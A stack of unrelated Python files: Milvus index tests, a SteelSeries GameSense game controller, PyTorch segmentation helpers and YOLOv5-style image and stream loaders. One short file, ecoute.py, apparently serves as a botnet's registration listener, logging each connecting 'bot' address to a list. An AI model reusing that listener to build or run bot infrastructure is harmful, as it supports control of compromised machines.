status, result = connect.search_vectors(ip_table, top_k, nprobe, query_vecs)
assert status.OK()
assert len(result) == len(query_vecs)
# logging.getLogger().info(result)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, ip_table, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(ip_table, vectors)
def build(connect):
status = connect.create_index(ip_table)
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(ip_table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multitable(self, connect, args):
'''
target: test create index interface with multiprocess
method: create table and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
table = []
j = 0
while j < (process_num*loop_num):
table_name = gen_unique_str("test_create_index_multiprocessing")
table.append(table_name)
param = {'table_name': table_name,
'dimension': dim}
connect.create_table(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_table(table[ids*process_num+i])
status, ids = connect.add_vectors(table[ids*process_num+i], vectors)
status = connect.create_index(table[ids*process_num+i])
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(table[ids*process_num+i], top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = Milvus()
m.connect(uri=uri)
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_no_vectors(self, connect, ip_table):
'''
target: test create index interface when there is no vectors in table
method: create table and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(ip_table, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, ip_table, get_simple_index_params):
'''
target: test create index interface when there is no vectors in table, and does not affect the subsequent process
method: create table and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index_params
status = connect.create_index(ip_table, index_param)
status, ids = connect.add_vectors(ip_table, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, ip_table):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
nlist = 16384
status, ids = connect.add_vectors(ip_table, vectors)
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(ip_table, index_param)
status = connect.create_index(ip_table, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
status, result = connect.search_vectors(ip_table, top_k, nprobe, query_vec)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, ip_table):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = 16384
status, ids = connect.add_vectors(ip_table, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
index_params = [{"index_type": index_type_1, "nlist": nlist}, {"index_type": index_type_2, "nlist": nlist}]
logging.getLogger().info(index_params)
for index_param in index_params:
status = connect.create_index(ip_table, index_param)
assert status.OK()
status, result = connect.describe_index(ip_table)
assert result._nlist == nlist
assert result._table_name == ip_table
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ip_table, get_index_params):
'''
target: test describe index interface
method: create table and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_params = get_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == ip_table
assert result._index_type == index_params["index_type"]
def test_describe_and_drop_index_multi_tables(self, connect, get_simple_index_params):
'''
target: test create, describe and drop index interface with multiple tables of IP
method: create tables and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(10):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_table(param)
index_params = get_simple_index_params
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table_name=table_name, records=vectors)
status = connect.create_index(table_name, index_params)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == index_params["nlist"]
assert result._table_name == table_list[i]
assert result._index_type == index_params["index_type"]
for i in range(10):
status = connect.drop_index(table_list[i])
assert status.OK()
status, result = connect.describe_index(table_list[i])
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == table_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, ip_table):
'''
target: test describe index without connection
method: describe index, and check if describe successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(ip_table)
def test_describe_index_not_create(self, connect, ip_table):
'''
target: test describe index interface when index not created
method: create table and add vectors in it, create index
, make sure the table name not in index
expected: return code not equals to 0, describe index failed
'''
status, ids = connect.add_vectors(ip_table, vectors)
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert status.OK()
# assert result._nlist == index_params["nlist"]
# assert result._table_name == table
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ip_table, get_index_params):
'''
target: test drop index interface
method: create table and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_params = get_index_params
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, ip_table, get_simple_index_params):
'''
target: test drop index repeatly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_params = get_simple_index_params
status, ids = connect.add_vectors(ip_table, vectors)
status = connect.create_index(ip_table, index_params)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, ip_table):
'''
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
'''
nlist = 16384
index_param = {"index_type": IndexType.IVFLAT, "nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(ip_table, index_param)
def test_drop_index_table_not_create(self, connect, ip_table):
'''
target: test drop index interface when index not created
method: create table and add vectors in it, create index
expected: return code not equals to 0, drop index failed
'''
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
logging.getLogger().info(index_param)
status, ids = connect.add_vectors(ip_table, vectors)
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(ip_table)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, ip_table, get_simple_index_params):
'''
target: test create / drop index repeatly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_params = get_simple_index_params
status, ids = connect.add_vectors(ip_table, vectors)
for i in range(2):
status = connect.create_index(ip_table, index_params)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, ip_table):
'''
target: test create / drop index repeatly, use the different index params
method: create index, drop index, four times, each tme use different index_params to create index
expected: return code 0
'''
nlist = 16384
index_params = [{"index_type": IndexType.IVFLAT, "nlist": nlist}, {"index_type": IndexType.IVF_SQ8, "nlist": nlist}]
status, ids = connect.add_vectors(ip_table, vectors)
for i in range(2):
status = connect.create_index(ip_table, index_params[i])
assert status.OK()
status, result = connect.describe_index(ip_table)
assert result._nlist == index_params[i]["nlist"]
assert result._table_name == ip_table
assert result._index_type == index_params[i]["index_type"]
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
status = connect.drop_index(ip_table)
assert status.OK()
status, result = connect.describe_index(ip_table)
logging.getLogger().info(result)
assert result._nlist == 16384
assert result._table_name == ip_table
assert result._index_type == IndexType.FLAT
class TestIndexTableInvalid(object):
"""
Test create / describe / drop index interfaces with invalid table names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_table_names()
)
def get_table_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_index_with_invalid_tablename(self, connect, get_table_name):
table_name = get_table_name
nlist = 16384
index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
status = connect.create_index(table_name, index_param)
assert not status.OK()
@pytest.mark.level(2)
def test_describe_index_with_invalid_tablename(self, connect, get_table_name):
table_name = get_table_name
status, result = connect.describe_index(table_name)
assert not status.OK()
@pytest.mark.level(2)
def test_drop_index_with_invalid_tablename(self, connect, get_table_name):
table_name = get_table_name
status = connect.drop_index(table_name)
assert not status.OK()
class TestCreateIndexParamsInvalid(object):
"""
Test Building index with invalid table names, table names not in db
"""
@pytest.fixture(
scope="function",
params=gen_invalid_index_params()
)
def get_index_params(self, request):
yield request.param
@pytest.mark.level(2)
def test_create_index_with_invalid_index_params(self, connect, table, get_index_params):
index_params = get_index_params
index_type = index_params["index_type"]
nlist = index_params["nlist"]
logging.getLogger().info(index_params)
status, ids = connect.add_vectors(table, vectors)
# if not isinstance(index_type, int) or not isinstance(nlist, int):
with pytest.raises(Exception) as e:
status = connect.create_index(table, index_params)
# else:
# status = connect.create_index(table, index_params)
# assert not status.OK()
|
Controller.py
|
import sys, os
from gui.gamesense import steelseries_gamesense
import steelseries_gamesense
import threading
import time
import Threads
import mod_gamesense_logger as logger
from config import Config as cfg
class Controller(object):
def __init__(self):
# Controller configuration
self.CtrlConfig_ClearOldGameSenseEvents = cfg["gamesense_config"]["clear_events_on_init"]
# Controller state
self.CtrlState_isInitialized = False
self.CtrlState_prevTimeLeft = 0.0
self.CtrlState_prevTimestamp = 0.0
# SteelSeries GameSense properties
self.GameSense_Name = cfg["gamesense_config"]["game_name"]
self.GameSense_NameHR = cfg["gamesense_config"]["game_nameHR"]
self.GameSense_DeviceType = cfg["gamesense_config"]["device_type"]
self.GameSense_ZoneHealth = cfg["gamesense_config"]["zone_health"]
self.GameSense_ZoneSpot = cfg["gamesense_config"]["zone_spot"]
self.GameSense_ZoneReload = cfg["gamesense_config"]["zone_reload"]
# global thread objects
self.Thread_KeepAlive = None
self.Thread_ResetSpotIndicator = None
self.Thread_UpdateReloadIndicator = None
Threads.GameSense_Name = self.GameSense_Name
return
def onHealthChanged(self, newHealth, maxHealth):
value = int(((float)(newHealth)/(float)(maxHealth))*100)
steelseries_gamesense.sendHealthEvent(self.GameSense_Name, value)
logger.logDebug("onHealthChanged called. | max health: ", maxHealth, " | ", newHealth, " event value: ", value)
def onEnterWorld(self):
"""
The game starts and evrything gets initialized.
"""
logger.logTrace("onEnterWorld called.")
logger.logDebug("Exe: ", sys.executable, "Import module search path: ", os.__file__)
# Initialize GameSense events
if not self.CtrlState_isInitialized:
self.CtrlState_isInitialized = True
steelseries_gamesense.readSteelseriesEnginePort.logged = False
# bind events
steelseries_gamesense.bindHealthEvent(self.GameSense_Name, self.GameSense_DeviceType, self.GameSense_ZoneHealth, self.CtrlConfig_ClearOldGameSenseEvents)
steelseries_gamesense.bindSpotEvent(self.GameSense_Name, self.GameSense_DeviceType, self.GameSense_ZoneSpot, self.CtrlConfig_ClearOldGameSenseEvents)
steelseries_gamesense.bindReloadEvent(self.GameSense_Name, self.GameSense_DeviceType, self.GameSense_ZoneReload, self.CtrlConfig_ClearOldGameSenseEvents)
# send init values for events
steelseries_gamesense.sendSpotEvent(self.GameSense_Name, 0)
steelseries_gamesense.sendReloadEvent(self.GameSense_Name, 100)
steelseries_gamesense.sendHealthEvent(self.GameSense_Name, 100)
# send meta data
steelseries_gamesense.sendGameMetaData(self.GameSense_Name, self.GameSense_NameHR, cfg["repo_info"]["author"])
# Start a thread for heartbeats to GameSense
if not self.Thread_KeepAlive:
self.Thread_KeepAlive = threading.Thread(target=Threads.keepGameSenseAlive, args=())
self.Thread_KeepAlive.start()
logger.logTrace("keepAliveThread started.")
def onLeaveWorld(self):
# print(logPrefix + "onLeaveWorld called.")
self.CtrlState_isInitialized = False
self.CtrlState_prevTimeLeft = 0.0
self.CtrlState_prevTimestamp = 0.0
if self.Thread_KeepAlive:
Threads.keepGameSenseAlive.terminate = True
self.Thread_KeepAlive = None
logger.logTrace("keepAliveThread stopped.")
if self.Thread_ResetSpotIndicator:
Threads.resetSpotIndicator.terminate = True
self.Thread_ResetSpotIndicator = None
logger.logTrace("resetSpotIndicatorThread stopped.")
if self.Thread_UpdateReloadIndicator:
Threads.updateReloadIndicator.terminate = True
self.Thread_UpdateReloadIndicator = None
logger.logTrace("updateReloadIndicatorThread stopped.")
# stop GameSense game
steelseries_gamesense.sendStopGame(self.GameSense_Name)
def showSixthSenseIndicator(self):
steelseries_gamesense.sendSpotEvent(self.GameSense_Name, 1)
self.Thread_ResetSpotIndicator = threading.Thread(target=Threads.resetSpotIndicator, args=())
self.Thread_ResetSpotIndicator.start()
logger.logTrace("resetSpotIndicatorThread started.")
def updateVehicleGunReloadTime(self, timeLeft, baseTime):
epsilon = 0.001
currentTimeSec = lambda: time.time()
# Sometimes this function gets called with a timeLeft value which can't be correct (e.g: 0 even if it just started reloading).
# Therefore only update the timeLeft value when it's greater than 0(+ epsilon).
# Or when it's 0 but then the time passed since the last update must be greater than the difference of the new and old timeLeft values.
if ( (abs(timeLeft) >= epsilon) or (abs(self.CtrlState_prevTimeLeft-timeLeft) <= abs(currentTimeSec() - self.CtrlState_prevTimestamp + epsilon)) ):
logger.logDebug("updateVehicleGunReloadTime called. | reload time left: ", timeLeft, " entire reload time: ", baseTime)
# Send new info to thread
Threads.updateReloadIndicator.timeLeft = timeLeft
Threads.updateReloadIndicator.updateTimeLeft = True
# update local values for further calculation
self.CtrlState_prevTimestamp = currentTimeSec()
self.CtrlState_prevTimeLeft = timeLeft
# Send new info to thread
Threads.updateReloadIndicator.baseTime = baseTime
# When there is no thread for the reload indicator already running, start a new one.
# Should only happen on the first call of this method.
if not self.Thread_UpdateReloadIndicator:
self.Thread_UpdateReloadIndicator = threading.Thread(target=Threads.updateReloadIndicator, args=())
self.Thread_UpdateReloadIndicator.start()
logger.logTrace("updateReloadIndicatorThread started.")
def __del__(self):
self.onLeaveWorld()
|
ecoute.py
|
#!/usr/bin/env python
import socket
import threading
def ajout(addr):
print "new bot ", addr
fichier = open("lstbot","r")
with open("lstbot","r") as f:
lines = f.readlines()
with open("lstbot","w") as f:
for line in lines:
if line.split(' ')[0] != addr[0]:
f.write(line)
f.write(addr[0]+" "+str(addr[1])+"\n")
ecoute = socket.socket()
ecoute.setsockopt(\
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
ecoute.bind(('',12222))
while (1):
ecoute.listen(1)
connection, addr = ecoute.accept()
t = threading.Thread(target = ajout,args=(addr,))
t.start()
|
utils_learn.py
|
import argparse
import json
import logging
import math
import os
from os.path import exists, join, split
import threading
import shutil
from fnmatch import filter
from PIL import Image
import torch
from torch import nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
# added for adversarial experiment
import torch.nn.functional as F
from distutils.version import LooseVersion
import numpy as np
def clamp_tensor(image, upper_bound, lower_bound):
image = torch.where(image > upper_bound, upper_bound, image)
image = torch.where(image < lower_bound, lower_bound, image)
return image
def back_transform(image, info):
# image = image2.copy()
image[:, 0, :, :] = image[:, 0, :, :] * info["std"][0] + info["mean"][0]
image[:, 1, :, :] = image[:, 1, :, :] * info["std"][1] + info["mean"][1]
image[:, 2, :, :] = image[:, 2, :, :] * info["std"][2] + info["mean"][2]
return image
def forward_transform(image, info):
image[:, 0, :, :] = (image[:, 0, :, :] - info["mean"][0]) / info["std"][0]
image[:, 1, :, :] = (image[:, 1, :, :] - info["mean"][1]) / info["std"][1]
image[:, 2, :, :] = (image[:, 2, :, :] - info["mean"][2]) / info["std"][2]
return image
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
def adjust_learning_rate(args, optimizer, epoch):
"""
Sets the learning rate to the initial LR decayed by 10 every 30 epochs
"""
if args.lr_mode == 'step':
lr = args.lr * (args.lr_change ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
elif args.lr_mode == 'schedule':
print('args.args.step_size_schedule',args.step_size_schedule)
assert len(args.step_size_schedule) == 3
lr = args.step_size_schedule[0][1]
if epoch >= args.step_size_schedule[1][0] and epoch < args.step_size_schedule[2][0]:
lr = args.step_size_schedule[1][1]
elif epoch >= args.step_size_schedule[2][0]:
lr = args.step_size_schedule[2][1]
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar', save_model_path = None):
try:
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, os.path.join(save_model_path, 'model_best.pth.tar'))
except:
for _ in range(30): print("--------------WARNING!!! FAILED TO SAVE. DISK POSSIBLY OUT OF SPACE--------------")
pass
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
if correct.size(0) == 0:
pass
# print('c1', correct.size())
correct = correct[target != 255]
correct = correct.view(-1)
if correct.size(0) == 0:
# print('c2', correct.size(), correct)
cor_num = correct.float().sum(0)
score = cor_num.mul(100.0 / 1)
else:
cor_num = correct.float().sum(0)
# print('correc size', correct.size(0))
score = cor_num.mul(100.0 / correct.size(0))
# print('cor num', cor_num, correct.size(0),correct.size())
# return score.data[0]
return score.data.item()
def cross_entropy2d(input, target, weight=None, size_average=True, ignore_index=255):
# input: (n, c, h, w), target: (n, h, w)
n, c, h, w = input.size()
# log_p: (n, c, h, w)
if LooseVersion(torch.__version__) < LooseVersion('0.3'):
# ==0.2.X
log_p = F.log_softmax(input)
else:
# >=0.3
log_p = F.log_softmax(input, dim=1)
# log_p: (n*h*w, c)
log_p = log_p.transpose(1, 2).transpose(2, 3).contiguous()
log_p = log_p[target.view(n, h, w, 1).repeat(1, 1, 1, c) >= 0]
log_p = log_p.view(-1, c)
# target: (n*h*w,)
mask = target >= 0
target = target[mask]
loss = F.nll_loss(log_p, target, weight=weight, reduction='sum', ignore_index=ignore_index)
if size_average:
loss /= mask.data.sum()
return loss
# added for adversarial experiment ends
def fill_up_weights(up):
w = up.weight.data
f = math.ceil(w.size(2) / 2)
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(w.size(2)):
for j in range(w.size(3)):
w[0, 0, i, j] = \
(1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
for c in range(1, w.size(0)):
w[c, 0, :, :] = w[0, 0, :, :]
def include_patterns(*patterns):
"""Factory function that can be used with copytree() ignore parameter.
Arguments define a sequence of glob-style patterns
that are used to specify what files to NOT ignore.
Creates and returns a function that determines this for each directory
in the file hierarchy rooted at the source directory when used with
shutil.copytree().
"""
def _ignore_patterns(path, names):
keep = set(name for pattern in patterns
for name in filter(names, pattern))
ignore = set(name for name in names
if name not in keep and not os.path.isdir(join(path, name)))
return ignore
return _ignore_patterns
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=stride,
pad=pad)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8]) # number of workers
dataloader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class LoadImages: # for inference
def __init__(self, path, img_size=640):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
